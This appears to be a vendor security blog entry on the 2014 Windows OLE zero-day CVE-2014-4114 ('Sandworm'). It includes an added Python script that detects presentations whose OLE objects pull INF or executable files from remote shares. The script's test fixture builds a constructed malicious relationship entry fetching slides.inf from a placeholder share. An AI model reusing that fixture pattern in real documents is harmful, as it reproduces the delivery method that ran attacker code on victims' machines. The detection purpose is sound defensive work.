Microsoft has announced the discovery of a zero-day vulnerability affecting all supported versions of Microsoft Windows (Vista and later) and Windows Server 2008 and 2012. Reports are also coming in that this vulnerability has been exploited in attacks against the North Atlantic Treaty Organization (NATO) and several European industries and sectors.
According to reports, this vulnerability (CVE-2014-4114) was exploited as part of a cyber-espionage campaign by a group dubbed the “Sandworm Team.” The vulnerability has allegedly been in use since August 2013, “mainly through weaponized PowerPoint documents.” Details of the vulnerability have been made available, including the following:
- The vulnerability exists in the OLE package manager (packager.dll) in Microsoft Windows and Windows Server.
- The OLE packager can retrieve and execute INF files. “In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allow a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources.”
- A successful exploit lets the attacker execute arbitrary code with the privileges of the user who opened the malicious file; the victim must open the document, so the attack depends on user interaction.
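The points above describe a Package OLE object that references an external file, such as an INF, instead of an embedded one. In an OOXML presentation (.pptx/.ppsx), the target of each OLE object is recorded in the slide's relationships part, and a target outside the package carries TargetMode="External". The following triage script, written for this entry as an added example and not code from the original post or from the Sandworm sample, walks those relationship parts and flags external OLE targets that point at a UNC share or file: URI, or at an INF or executable. The in-memory sample documents, the 192.0.2.10 address (a documentation address, not a real indicator) and the risk heuristics are all constructed assumptions for illustration.

```python
"""Triage an OOXML presentation (.pptx/.ppsx) for OLE Package objects that
reference external files, the pattern described for CVE-2014-4114.

Added example for this entry; it is not Trend Micro code and the constructed
sample below is not a copy of the real Sandworm document.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Heuristics (assumptions, not a complete signature): an OLE object reached
# through a UNC path or file: URI, and file types the packager would hand to
# an installer or the shell rather than render.
UNC_OR_FILE_RE = re.compile(r"^(?:\\\\|file:)", re.IGNORECASE)
RISKY_EXTENSIONS = (".inf", ".exe", ".scr", ".bat", ".cmd", ".vbs", ".js", ".hta")


def external_ole_targets(doc_bytes):
    """Return (rels_part, rel_id, target, flags) for every oleObject
    relationship with TargetMode="External" in the presentation."""
    findings = []
    if not zipfile.is_zipfile(io.BytesIO(doc_bytes)):
        return findings  # legacy binary .ppt is outside this parser's scope
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append((name, None, None, {"malformed_rels"}))
                continue
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue  # embedded object: payload lives inside the package
                target = rel.get("Target", "")
                flags = set()
                if UNC_OR_FILE_RE.match(target):
                    flags.add("unc_or_file_uri")
                if target.lower().strip().endswith(RISKY_EXTENSIONS):
                    flags.add("executable_or_inf_target")
                findings.append((name, rel.get("Id"), target, flags))
    return findings


def is_suspicious(doc_bytes):
    """True when any external OLE object target carries a risk flag."""
    return any(flags for _, _, _, flags in external_ole_targets(doc_bytes))


def build_presentation(rels_xml):
    """Build a minimal in-memory .ppsx holding one slide rels part
    (constructed test input, not a full presentation)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


RELS_HEADER = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
               '<Relationships xmlns="%s">' % PKG_REL_NS)

# Constructed sample in the shape the entry describes: a Package OLE object
# pulling an INF and a second file from an attacker-controlled share.
MALICIOUS_RELS = RELS_HEADER + (
    '<Relationship Id="rId2" Type="%s" '
    'Target="file:///\\\\192.0.2.10\\public\\slides.inf" TargetMode="External"/>'
    '<Relationship Id="rId3" Type="%s" '
    'Target="\\\\192.0.2.10\\public\\slide1.gif" TargetMode="External"/>'
    '</Relationships>') % (OLE_REL_TYPE, OLE_REL_TYPE)

# Constructed benign sample: the OLE object is embedded in the package.
BENIGN_RELS = RELS_HEADER + (
    '<Relationship Id="rId2" Type="%s" Target="../embeddings/oleObject1.bin"/>'
    '</Relationships>') % OLE_REL_TYPE

MALICIOUS_PPSX = build_presentation(MALICIOUS_RELS)
BENIGN_PPSX = build_presentation(BENIGN_RELS)

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_PPSX), ("benign", BENIGN_PPSX)):
        print(label, "suspicious:", is_suspicious(doc))
        for part, rid, target, flags in external_ole_targets(doc):
            print("   ", part, rid, target, sorted(flags))
```

Run against the constructed samples, the malicious document yields two external OLE targets (the INF with both flags, the .gif on the same share with the UNC flag) and the benign one yields none. The script deliberately treats any external OLE reference as worth a look: an embedded object is the normal case, and an OLE object that is fetched from another host at open time is rare in legitimate documents regardless of its extension.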
Microsoft has announced that it will release a patch for this vulnerability as part of this month’s Patch Tuesday. We encourage both users and administrators to download and install the patch as soon as it is made available.
We are currently analyzing the related sample. We will update this entry as soon as more details and solutions are available.
Update as of October 15, 2014, 11:24 P.M. (PDT):
Further analysis of this zero-day vulnerability can be found in our entry, An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm.” You may also read the entry October 2014 Patch Tuesday Fixes Sandworm Vulnerability for information regarding the corresponding patch.